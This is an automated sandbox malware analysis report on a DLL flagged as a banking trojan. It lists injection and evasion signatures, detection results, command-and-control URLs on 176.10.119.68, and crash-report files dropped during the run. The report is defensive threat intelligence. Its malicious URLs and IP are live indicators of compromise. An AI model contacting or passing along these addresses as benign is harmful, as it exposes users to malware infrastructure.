sleep 37->66 68 Uses ping.exe to check the status of other devices and networks 37->68 46 conhost.exe 37->46         started        48 PING.EXE 37->48         started        70 Changes memory attributes in foreign processes to executable or writable 44->70 72 Injects code into the Windows Explorer (explorer.exe) 44->72 74 Writes to foreign memory regions 44->74 76 4 other signatures 44->76 process12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      628df1368bdb5.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.1350000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://176.10.119.68/100%Avira URL Cloudphishing
                      http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlk100%Avira URL Cloudphishing
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlk100%Avira URL Cloudphishing
                      https://contoso.com/0%URL Reputationsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2Fxy100%Avira URL Cloudphishing
                      http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/100%Avira URL Cloudphishing
                      http://176.10.119.68/=i_100%Avira URL Cloudphishing
                      http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlk100%Avira URL Cloudphishing
                      http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4V100%Avira URL Cloudphishing

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      l-0007.l-dc-msedge.net
                      		13.107.43.16
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlktrue
                        • Avira URL Cloud: phishing
                        		unknown
                        http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlktrue
                        • Avira URL Cloud: phishing
                        		unknown
                        http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlktrue
                        • Avira URL Cloud: phishing
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://176.10.119.68/rundll32.exe, 00000002.00000003.339926969.0000000003510000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329887519.0000000003510000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2Fxyrundll32.exe, 00000002.00000003.329876196.00000000034F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329894971.0000000003518000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453772762.0000000003518000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              http://176.10.119.68/=i_rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329894971.0000000003518000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001A.00000002.469002593.0000021CAB3F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4Vrundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453537625.00000000034AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453772762.0000000003518000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: phishing
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  176.10.119.68
                                  		unknownSwitzerland
                                  		51395AS-SOFTPLUSCHtrue

                                  Private

                                  IP
                                  192.168.2.1

                                  General Information

                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:633910
                                  Start date and time: 25/05/202211:16:122022-05-25 11:16:12 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 11m 31s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:628df1368bdb5.dll
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:45
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:1
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.bank.troj.evad.winDLL@28/31@0/2
                                  EGA Information:
                                  • Successful, ratio: 75%
                                  HDC Information:
                                  • Successful, ratio: 75.9% (good quality ratio 55.6%)
                                  • Quality average: 60.4%
                                  • Quality standard deviation: 41.4%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .dll
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Override analysis time to 240s for rundll32

                                  Warnings

                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                  • TCP Packets have been reduced to 100
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.43.16, 20.42.73.29
                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, time.windows.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, config.edge.skype.com
                                  • Execution Graph export aborted for target mshta.exe, PID 6924 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • VT rate limit hit for: 628df1368bdb5.dll

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  11:17:27API Interceptor1x Sleep call for process: rundll32.exe modified
                                  11:18:03API Interceptor2x Sleep call for process: WerFault.exe modified
                                  11:18:13API Interceptor26x Sleep call for process: powershell.exe modified
                                  11:19:03API Interceptor1x Sleep call for process: explorer.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_2f670449314c9cbe26f2787fed1eece2045eb75_7cac0383_1a8a9c09\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.745764915476303
                                  Encrypted:false
                                  SSDEEP:96:5XFUEWnYyMy9haoCjmfspXIQcQ5c6cEcE2cw3+G+a+z+HbHgVownOgtYsXqOEX/J:pyJnsHXJ8K0jeq/u7slS274ItW
                                  MD5:6D0CE1AA8EB405757DBA87A6C96DD333
                                  SHA1:545B384FB1051CD8DA5C7F622556669D68F13FAF
                                  SHA-256:CAD3CB3C6CB1EF7CE6B5ADC19F8504D0CC695A4DF908900FAFFEA5AE8799592B
                                  SHA-512:68B82D10BD6333B4B07849741750C2B46E1BD20060FFFF33841355504A35B2569087D17C87F08BEDD51C26786B336AB41370D4D4FF18226A0E44E06035041612
                                  Malicious:false
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.9.4.3.8.8.5.4.7.4.1.7.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.9.4.3.8.8.7.7.2.4.1.5.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.3.b.c.7.7.2.-.c.c.e.6.-.4.a.8.0.-.8.5.0.2.-.e.2.a.b.b.e.7.c.3.c.f.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.7.d.7.9.0.f.-.c.1.4.3.-.4.d.b.b.-.8.4.b.a.-.e.8.d.5.a.3.f.d.5.5.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.5.4.-.0.0.0.1.-.0.0.1.c.-.5.a.1.9.-.8.4.3.d.1.8.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_895e5a36908a521ee0a162e13575c3f3aee3817c_7cac0383_00b9f588\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.7421039220862186
                                  Encrypted:false
                                  SSDEEP:96:/49WnYysy9haoCj+ASZpXIQcQGc6McE+cw3/7+a+z+HbHgVownOgtYsXqOEX/vFc:/1nrHoIE/jeq/u7slS274Itb
                                  MD5:D85313EAEA6452E5F2371E06EB498FA9
                                  SHA1:6A5708166DC83214B26C58B9D372754158B93C1E
                                  SHA-256:29963CA5DC704D111EFF54B0A07AA35C1B9937BA3BE5AA382C91D4FACAD4830C
                                  SHA-512:1F1E645A89F258FD23770E643B1804C96E96C84F0A4F251871B9378A012BC2387FDCFEBFA6CCF196E66A5EA2EAF7C0180E58424699D0B999520A7DF0C52DE51A
                                  Malicious:false
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.9.4.3.8.4.5.4.5.8.1.2.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.8.a.4.2.8.b.-.8.e.b.f.-.4.5.c.7.-.b.f.7.1.-.5.4.6.1.e.d.7.a.c.9.d.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.a.c.7.7.e.3.-.0.7.a.2.-.4.f.2.0.-.9.a.a.e.-.5.a.1.c.b.9.6.3.2.0.4.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.5.4.-.0.0.0.1.-.0.0.1.c.-.5.a.1.9.-.8.4.3.d.1.8.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_8f579be425d8a5cc6392bac965f2eeac594eed7_7cac0383_14da83fd\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.7487188306064417
                                  Encrypted:false
                                  SSDEEP:96:s7JFMccWnYyjy9haoB7Jn4pXIQcQGc6McE+cw3/7+a+z+HbHgVownOgtYsXqOEXR:st5nZHoIE/jeq/u7slS274ItW
                                  MD5:543A245C1119F433D655909A71EBD139
                                  SHA1:3796002B474B2E1348C7D3CB22BB5CEC0E195293
                                  SHA-256:6D2ED7900DCF11A1F5B7ECA510ABE1275EE048A9758FE70BC1DA11DBE9A66080
                                  SHA-512:50B652E678D41E274E46B1DF92F9CA3D0EF911B89E22A8EB59877FE6F5879F75624BDA790301F97E90E701907A4ACA673CB3335F4A14F0A2AAE773085B4E1A3D
                                  Malicious:false
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.9.4.3.8.4.9.0.0.7.4.5.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.9.4.3.8.5.0.4.6.0.5.5.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.3.e.6.7.6.9.-.f.0.4.e.-.4.1.8.d.-.8.b.6.a.-.f.5.7.c.3.a.1.3.3.c.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.9.e.3.e.1.5.-.e.6.9.a.-.4.c.0.5.-.a.b.9.f.-.0.3.d.1.4.e.3.0.a.1.0.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.5.4.-.0.0.0.1.-.0.0.1.c.-.5.a.1.9.-.8.4.3.d.1.8.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER27A.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4598
                                  Entropy (8bit):4.465700585531507
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsRjiJgtWI9sKWgc8sqYjK8fm8M4J2+UZF9R+q84lh1KcQIcQw05d:uITfR8DrgrsqYrJCrb1Kkw05d
                                  MD5:199DA7379200C4E0E164C00B3583CCEE
                                  SHA1:E3DB6D40367CEA92A736F85772C327BF04913ABD
                                  SHA-256:63CD40169DB3BEFF9C2B0D7432F16FBF4E71AEBE76812C8809691E80491B7458
                                  SHA-512:346FB7EF14A05C1564B4E6FCA935BE749AEDA3469AE411272BBB4E713F1ED385C6DA6471140E0FA03F1806B4797D5B738713CB6E2C67732C5595C4640E0F9B73
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1530388" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C69.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:18:06 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):52470
                                  Entropy (8bit):2.1572306080657984
                                  Encrypted:false
                                  SSDEEP:192:1dO/k650mOn6p8ax4uVgM0YJKHkH/QqvOO8kVVugFcuGiMIthxziNZpCjQbhl6vo:TWMn6p8a6QgOoPqvjZsUxDMIsNZCw
                                  MD5:1784E4C57925E4297CA13484763EF34F
                                  SHA1:AB10CE4EF10801BA0C545BFB62481F7D86250D4E
                                  SHA-256:E06B887BE0BE2C72F1156786010743EADC7E4D8333A098B28572AE6E5395B24F
                                  SHA-512:7FE190A900D5AC4F2340B1353E1ADBCD664353F887F1CBCD91BCCBC0BD103B56E4CFDEBAE9652AB765CABFDF7A5D32582CC9F131FB3DD54E8D592DEE4CA0D8FE
                                  Malicious:false
                                  Preview:MDMP....... .......N.b........................L...........$................!..........`.......8...........T............................................................................................................U...........B..............GenuineIntelW...........T.......T...".b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9081.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8298
                                  Entropy (8bit):3.6895098230001713
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNieZ6bywm6Y4iSUn1wgmfHSDluF+pDo89bcrsfC6Um:RrlsNiI6uwm6YtSUn1wgmfHSD3cwfC4
                                  MD5:6DAF60975F19E781170EEAB7A9EDD920
                                  SHA1:E9C3C282C88F039EE985EDA2F9008C0745262BB5
                                  SHA-256:91D4E72819EB6B4EE6730FBD4DC4F463AB2DC38733BC289F32FC44E3590B591E
                                  SHA-512:BA408D8B858CB4C7ACB532AA7F2C7B399BD0B75C161F6B96065D4982E8638E81D9F60948FC6A647C3A003656453D565F38A2158CE01C2116542FC4903993053C
                                  Malicious:false
